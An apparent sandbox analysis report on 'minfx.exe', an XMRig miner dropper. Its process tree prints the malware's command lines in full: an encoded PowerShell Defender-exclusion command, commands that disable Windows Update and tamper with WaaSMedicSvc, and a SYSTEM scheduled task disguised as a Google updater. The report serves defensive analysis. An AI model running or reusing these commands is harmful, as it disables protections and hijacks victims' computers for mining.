General
Target

minfx.exe

Filesize

4MB

Completed

13-05-2022 17:57

Task

behavioral2

Score
10/10
MD5

8268ff95b3aaea6d6de8f02a73c323d2

SHA1

ae470145c4f5780315b52aa1c57ae0c04a2d18ca

SHA256

529831a3e5b7b61f74f7a426e828210017daf1eea2cbf7cf997c13d82822aef8

SHA256

9603dde1bfd9874637e63a268a7c8f85032892b4e58d3f96678dfbb52b453a972e00cd49077574e58726d3c5045788ede5a9b81c89a464342d5b64070c7325c0

Malware Config
Signatures 13

Filter: none

Defense Evasion
Impact
Persistence
  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • XMRig Miner Payload

    Tags

    Reported IOCs

    resourceyara_rule
    behavioral2/memory/3008-208-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/3008-209-0x000000014036DAD4-mapping.dmpxmrig
    behavioral2/memory/3008-210-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/3008-211-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
    behavioral2/memory/3008-213-0x0000000140000000-0x0000000140803000-memory.dmpxmrig
  • Executes dropped EXE
    updater.exe

    Reported IOCs

    pidprocess
    1276updater.exe
  • Possible privilege escalation attempt
    takeown.exeicacls.exetakeown.exeicacls.exe

    Tags

    Reported IOCs

    pidprocess
    4400takeown.exe
    5000icacls.exe
    1124takeown.exe
    496icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Modifies file permissions
    takeown.exeicacls.exetakeown.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    4400takeown.exe
    5000icacls.exe
    1124takeown.exe
    496icacls.exe
  • Suspicious use of SetThreadContext
    conhost.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 3424 set thread context of 31363424conhost.execonhost.exe
    PID 3424 set thread context of 30083424conhost.exeexplorer.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    5004schtasks.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.execonhost.exepowershell.execonhost.exeexplorer.exe

    Reported IOCs

    pidprocess
    4892powershell.exe
    4892powershell.exe
    3988conhost.exe
    3576powershell.exe
    3576powershell.exe
    3424conhost.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
    3008explorer.exe
  • Suspicious behavior: LoadsDriver

    Reported IOCs

    pidprocess
    664
  • Suspicious use of AdjustPrivilegeToken
    powershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exeexplorer.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege4892powershell.exe
    Token: SeDebugPrivilege3988conhost.exe
    Token: SeShutdownPrivilege1148powercfg.exe
    Token: SeCreatePagefilePrivilege1148powercfg.exe
    Token: SeShutdownPrivilege4408powercfg.exe
    Token: SeCreatePagefilePrivilege4408powercfg.exe
    Token: SeShutdownPrivilege4392powercfg.exe
    Token: SeCreatePagefilePrivilege4392powercfg.exe
    Token: SeShutdownPrivilege1388powercfg.exe
    Token: SeCreatePagefilePrivilege1388powercfg.exe
    Token: SeDebugPrivilege3576powershell.exe
    Token: SeDebugPrivilege3424conhost.exe
    Token: SeShutdownPrivilege2920powercfg.exe
    Token: SeCreatePagefilePrivilege2920powercfg.exe
    Token: SeShutdownPrivilege2968powercfg.exe
    Token: SeCreatePagefilePrivilege2968powercfg.exe
    Token: SeShutdownPrivilege3312powercfg.exe
    Token: SeCreatePagefilePrivilege3312powercfg.exe
    Token: SeShutdownPrivilege1380powercfg.exe
    Token: SeCreatePagefilePrivilege1380powercfg.exe
    Token: SeLockMemoryPrivilege3008explorer.exe
    Token: SeLockMemoryPrivilege3008explorer.exe
  • Suspicious use of WriteProcessMemory
    minfx.execonhost.execmd.execmd.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 888 wrote to memory of 3988888minfx.execonhost.exe
    PID 888 wrote to memory of 3988888minfx.execonhost.exe
    PID 888 wrote to memory of 3988888minfx.execonhost.exe
    PID 3988 wrote to memory of 17003988conhost.execmd.exe
    PID 3988 wrote to memory of 17003988conhost.execmd.exe
    PID 1700 wrote to memory of 48921700cmd.exepowershell.exe
    PID 1700 wrote to memory of 48921700cmd.exepowershell.exe
    PID 3988 wrote to memory of 44763988conhost.execmd.exe
    PID 3988 wrote to memory of 44763988conhost.execmd.exe
    PID 3988 wrote to memory of 45363988conhost.execmd.exe
    PID 3988 wrote to memory of 45363988conhost.execmd.exe
    PID 4476 wrote to memory of 50444476cmd.exesc.exe
    PID 4476 wrote to memory of 50444476cmd.exesc.exe
    PID 4476 wrote to memory of 30524476cmd.exesc.exe
    PID 4476 wrote to memory of 30524476cmd.exesc.exe
    PID 4536 wrote to memory of 11484536cmd.exepowercfg.exe
    PID 4536 wrote to memory of 11484536cmd.exepowercfg.exe
    PID 4476 wrote to memory of 18644476cmd.exesc.exe
    PID 4476 wrote to memory of 18644476cmd.exesc.exe
    PID 4476 wrote to memory of 36644476cmd.exesc.exe
    PID 4476 wrote to memory of 36644476cmd.exesc.exe
    PID 4536 wrote to memory of 44084536cmd.exepowercfg.exe
    PID 4536 wrote to memory of 44084536cmd.exepowercfg.exe
    PID 3988 wrote to memory of 31883988conhost.execmd.exe
    PID 3988 wrote to memory of 31883988conhost.execmd.exe
    PID 4536 wrote to memory of 43924536cmd.exepowercfg.exe
    PID 4536 wrote to memory of 43924536cmd.exepowercfg.exe
    PID 4476 wrote to memory of 15084476cmd.exesc.exe
    PID 4476 wrote to memory of 15084476cmd.exesc.exe
    PID 3188 wrote to memory of 50043188cmd.exeschtasks.exe
    PID 3188 wrote to memory of 50043188cmd.exeschtasks.exe
    PID 4476 wrote to memory of 41364476cmd.exesc.exe
    PID 4476 wrote to memory of 41364476cmd.exesc.exe
    PID 4536 wrote to memory of 13884536cmd.exepowercfg.exe
    PID 4536 wrote to memory of 13884536cmd.exepowercfg.exe
    PID 4476 wrote to memory of 33524476cmd.exesc.exe
    PID 4476 wrote to memory of 33524476cmd.exesc.exe
    PID 4476 wrote to memory of 41444476cmd.exesc.exe
    PID 4476 wrote to memory of 41444476cmd.exesc.exe
    PID 4476 wrote to memory of 45404476cmd.exesc.exe
    PID 4476 wrote to memory of 45404476cmd.exesc.exe
    PID 4476 wrote to memory of 23644476cmd.exesc.exe
    PID 4476 wrote to memory of 23644476cmd.exesc.exe
    PID 4476 wrote to memory of 24964476cmd.exesc.exe
    PID 4476 wrote to memory of 24964476cmd.exesc.exe
    PID 4476 wrote to memory of 23924476cmd.exesc.exe
    PID 4476 wrote to memory of 23924476cmd.exesc.exe
    PID 4476 wrote to memory of 26644476cmd.exesc.exe
    PID 4476 wrote to memory of 26644476cmd.exesc.exe
    PID 4476 wrote to memory of 38724476cmd.exesc.exe
    PID 4476 wrote to memory of 38724476cmd.exesc.exe
    PID 4476 wrote to memory of 47404476cmd.exesc.exe
    PID 4476 wrote to memory of 47404476cmd.exesc.exe
    PID 4476 wrote to memory of 44004476cmd.exetakeown.exe
    PID 4476 wrote to memory of 44004476cmd.exetakeown.exe
    PID 4476 wrote to memory of 50004476cmd.exeicacls.exe
    PID 4476 wrote to memory of 50004476cmd.exeicacls.exe
    PID 4476 wrote to memory of 47684476cmd.exereg.exe
    PID 4476 wrote to memory of 47684476cmd.exereg.exe
    PID 4476 wrote to memory of 14044476cmd.exereg.exe
    PID 4476 wrote to memory of 14044476cmd.exereg.exe
    PID 4476 wrote to memory of 15644476cmd.exereg.exe
    PID 4476 wrote to memory of 15644476cmd.exereg.exe
    PID 4476 wrote to memory of 27484476cmd.exereg.exe
Processes 85
  • C:\Users\Admin\AppData\Local\Temp\minfx.exe
    "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
    Suspicious use of WriteProcessMemory
    PID:888
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\minfx.exe"
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3988
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
        Suspicious use of WriteProcessMemory
        PID:1700
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:4892
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:4476
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:5044
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:3052
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1864
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:3664
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1508
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:4136
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:3352
        • C:\Windows\system32\sc.exe
          sc config bits start= disabled
          PID:4144
        • C:\Windows\system32\sc.exe
          sc failure bits reset= 0 actions= ""
          PID:4540
        • C:\Windows\system32\sc.exe
          sc config dosvc start= disabled
          PID:2364
        • C:\Windows\system32\sc.exe
          sc failure dosvc reset= 0 actions= ""
          PID:2496
        • C:\Windows\system32\sc.exe
          sc config UsoSvc start= disabled
          PID:2392
        • C:\Windows\system32\sc.exe
          sc failure UsoSvc reset= 0 actions= ""
          PID:2664
        • C:\Windows\system32\sc.exe
          sc config wuauserv start= disabled
          PID:3872
        • C:\Windows\system32\sc.exe
          sc failure wuauserv reset= 0 actions= ""
          PID:4740
        • C:\Windows\system32\takeown.exe
          takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          PID:4400
        • C:\Windows\system32\icacls.exe
          icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:5000
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
          PID:4768
        • C:\Windows\system32\reg.exe
          reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
          PID:1404
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
          PID:1564
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          PID:2748
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          PID:404
        • C:\Windows\system32\reg.exe
          reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          PID:2152
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
          PID:3296
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
          PID:2940
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
          PID:3552
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
          PID:4228
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
          PID:1980
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
          PID:2808
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
          PID:1988
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        Suspicious use of WriteProcessMemory
        PID:4536
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:1148
        • C:\Windows\system32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:4408
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          Suspicious use of AdjustPrivilegeToken
          PID:4392
        • C:\Windows\system32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          Suspicious use of AdjustPrivilegeToken
          PID:1388
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        Suspicious use of WriteProcessMemory
        PID:3188
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
          Creates scheduled task(s)
          PID:5004
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
        PID:4804
        • C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          C:\Users\Admin\AppData\Roaming\Chrome\updater.exe
          Executes dropped EXE
          PID:1276
          • C:\Windows\System32\conhost.exe
            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Chrome\updater.exe"
            Suspicious use of SetThreadContext
            Suspicious behavior: EnumeratesProcesses
            Suspicious use of AdjustPrivilegeToken
            PID:3424
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
              PID:2176
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -EncodedCommand "PAAjAHEAeQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAcwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBiAHoAaABiACMAPgA="
                Suspicious behavior: EnumeratesProcesses
                Suspicious use of AdjustPrivilegeToken
                PID:3576
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
              PID:4312
              • C:\Windows\system32\sc.exe
                sc stop wuauserv
                PID:4512
              • C:\Windows\system32\sc.exe
                sc stop bits
                PID:868
              • C:\Windows\system32\sc.exe
                sc stop dosvc
                PID:4468
              • C:\Windows\system32\sc.exe
                sc stop UsoSvc
                PID:1592
              • C:\Windows\system32\sc.exe
                sc stop WaaSMedicSvc
                PID:3524
              • C:\Windows\system32\sc.exe
                sc config wuauserv start= disabled
                PID:3420
              • C:\Windows\system32\sc.exe
                sc failure wuauserv reset= 0 actions= ""
                PID:4460
              • C:\Windows\system32\sc.exe
                sc config bits start= disabled
                PID:1244
              • C:\Windows\system32\sc.exe
                sc failure bits reset= 0 actions= ""
                PID:1004
              • C:\Windows\system32\sc.exe
                sc config dosvc start= disabled
                PID:4572
              • C:\Windows\system32\sc.exe
                sc failure dosvc reset= 0 actions= ""
                PID:4760
              • C:\Windows\system32\sc.exe
                sc config UsoSvc start= disabled
                PID:4120
              • C:\Windows\system32\sc.exe
                sc failure UsoSvc reset= 0 actions= ""
                PID:1096
              • C:\Windows\system32\sc.exe
                sc config wuauserv start= disabled
                PID:1724
              • C:\Windows\system32\sc.exe
                sc failure wuauserv reset= 0 actions= ""
                PID:3568
              • C:\Windows\system32\takeown.exe
                takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll
                Possible privilege escalation attempt
                Modifies file permissions
                PID:1124
              • C:\Windows\system32\icacls.exe
                icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                Possible privilege escalation attempt
                Modifies file permissions
                PID:496
              • C:\Windows\system32\reg.exe
                reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                PID:2952
              • C:\Windows\system32\reg.exe
                reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                PID:3892
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f
                PID:4012
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                PID:3872
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                PID:2672
              • C:\Windows\system32\reg.exe
                reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                PID:2340
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE
                PID:1744
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start" /DISABLE
                PID:672
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sih" /DISABLE
                PID:1764
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\sihboot" /DISABLE
                PID:112
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistant" /DISABLE
                PID:4076
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantCalendarRun" /DISABLE
                PID:4884
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Change /TN "\\Microsoft\\Windows\\UpdateOrchestrator\\UpdateAssistantWakeupRun" /DISABLE
                PID:32
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              PID:4196
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                Suspicious use of AdjustPrivilegeToken
                PID:2920
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                Suspicious use of AdjustPrivilegeToken
                PID:2968
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                Suspicious use of AdjustPrivilegeToken
                PID:3312
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                Suspicious use of AdjustPrivilegeToken
                PID:1380
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe
              PID:3136
            • C:\Windows\explorer.exe
              C:\Windows\explorer.exe clcmeewnjgen0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPBwfs6hsH6BZWYzKcgqh8/w5KES9i8iVGoln9YNKyIMIhchOv/qhVSSEyQVeeilGRs3EMCL7VVGCZZSNmGX+WhFkG6w6YtPhSONt0KQQX8lWBvZt8FTQet3u0ld4bcUsTw5fhWYnAMLoF2LOPPGYB2TrjMWdV62jpwHJofDnqBDBuWFMcEnGAyC28ts80L6HbzDjD0sBquAT4Mewl/rkK/eevnCIDRRDM/KANXpzBDbtzl320IoXjIb++yELBFh84SFIEF7L1qVd4YMHKeZwe807fKfwUBxVnRO7THuzKbYajHeg/I3SfaR6UzIZjCjwxfhgN5uZ2YUVYF2II6O4qeOY3s8Ab9cm7XC77uCy/Na4z1O1SfjGZbw/cD9kQ+XXgNvtDG6BognpyTqDH6/Yd56nhRN7gcoUiQQ2GwpUmVPUtKsvTrf3487LBbzei+Xrzzg==
              Suspicious behavior: EnumeratesProcesses
              Suspicious use of AdjustPrivilegeToken
              PID:3008
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Discovery
          Execution
            Exfiltration
              Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                      MD5

                      8add56521ef894ef0c66ecd3e989d718

                      SHA1

                      2058aa5185fd5dcce7263bef8fe35bf5e12dbc7f

                      SHA256

                      01bcb6c8348b83208a7c923fd840130a0bc7b3a188b62ad8e270a296ed94b724

                      SHA512

                      af99971664282617c18db6a27ddb3bf57eaa291d79ef66828319de3eb38533cc813f7d322cc4c9e687aa90b5c91b7874ed8e725c3cfe35e139e0581492caefb2

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

